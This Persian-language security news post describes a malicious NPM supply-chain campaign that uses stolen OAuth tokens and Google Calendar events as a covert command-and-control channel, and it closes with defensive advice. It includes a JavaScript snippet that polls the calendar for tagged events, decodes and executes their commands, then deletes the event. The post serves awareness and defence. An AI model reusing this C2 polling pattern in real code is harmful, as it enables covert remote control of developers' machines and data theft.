ایران‌هک را در شبکه‌های اجتماعی دنبال کنید

گروه سایبری ایران هک

142

امنیت, بدافزار, جنگ سایبری

حمله پیشرفته به NPM با استفاده از Google Calendar به‌عنوان کانال فرمان‌دهی و کنترل (C2)

145نمایش

پژوهشگران امنیتی حمله زنجیره تأمین بسیار پیشرفته‌ای را کشف کرده‌اند که محیط توسعه Node.js (NPM) را هدف قرار داده و از سرویس Google Calendar برای ارتباط مخفیانه با مهاجمان استفاده می‌کند.

🎯 سناریوی حمله

  • حمله از طریق پکیج‌های آلوده NPM آغاز می‌شود که به‌ظاهر مشروع هستند اما کدهای مخرب مبهم‌سازی‌شده را در خود دارند.

  • این پکیج‌ها تا پیش از کشف، بیش از ۳۵,۰۰۰ بار دانلود شده‌اند.

  • بدافزار با استفاده از توکن‌های OAuth دزدیده‌شده به Google Calendar دسترسی پیدا می‌کند.

  • دستورات رمزگذاری‌شده (Base64) در بخش‌هایی مثل توضیح رویداد (description)، مکان (location) و فهرست شرکت‌کنندگان قرار داده می‌شوند.

🔄 مکانیزم ارتباط با مهاجم (C2)

  • بدافزار یک فرایند پنهانی ایجاد می‌کند که به‌صورت دوره‌ای تقویم کاربر را بررسی می‌کند.

  • اگر رویدادی با نشانگر خاص (مثلاً sync_status) پیدا شود، توضیحات آن استخراج و رمزگشایی می‌شود.

  • سپس دستور اجرا می‌شود و رویداد پاک یا تغییر داده می‌شود تا دریافت آن تأیید شود.

const {google} = require(‘googleapis’);
const calendar = google.calendar({version: ‘v3’, auth: stolenOAuth});

async function checkForCommands() {
const res = await calendar.events.list({
calendarId: ‘primary’,
timeMin: new Date().toISOString(),
maxResults: 10,
singleEvents: true,
orderBy: ‘startTime’,
q: ‘sync_status’
});
const events = res.data.items;
if (events.length) {
const commands = decodeCommands(events[0].description);
executeCommands(commands);
await calendar.events.delete({calendarId: ‘primary’, eventId: events[0].id});
}
}

📦 عملکردهای بدافزار

  • اجرای دستورات از راه دور

  • سرقت داده‌های حساس و بارگذاری به‌صورت مخفی در پیوست‌های تقویم یا یادداشت جلسه

  • دانلود و اجرای payloadهای اضافی

  • فرار از تشخیص با تاخیر در اجرا و جلوگیری از اجرای در محیط‌های مجازی یا ابزارهای تحلیل

🛡️ اقدامات پیشگیرانه برای سازمان‌ها

  • نظارت دقیق روی اپلیکیشن‌های OAuth متصل به حساب‌های سازمانی

  • اسکن کامل وابستگی‌های پروژه‌های Node.js با ابزارهای امن

  • بررسی رفتاری APIها مخصوصاً تقویم گوگل، و شناسایی فعالیت‌های غیرعادی

  • هشدار برای رویدادهای تقویم حاوی محتوای رمزگذاری‌شده یا غیرمنتظره

  • استفاده از ابزارهایی مانند Veracode، Snyk، یا Socket.dev برای تحلیل پکیج‌های NPM

📢 نتیجه‌گیری:
این حمله نشان‌دهنده سطح جدیدی از سوءاستفاده از سرویس‌های ابری مشروع مانند Google Calendar برای مخفی‌سازی ارتباطات بدافزاری است.
پنهان شدن در ترافیک عادی و استفاده از OAuth، شناسایی و حذف این نوع بدافزارها را برای تیم‌های امنیتی به شدت دشوار می‌کند.
این رویداد تأکید می‌کند که امنیت در زنجیره تأمین نرم‌افزار باید جدی‌تر از همیشه در نظر گرفته شود.

, , , , , , , , , , , , ,

دوست داشتید؟ لطفا با دوستان خود به اشتراک بگذارید.

142

یک نظر

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

ورود به اسایت

Captcha!
Forgot password?

رمز را فراموش کردم

Back to
ورود به اسایت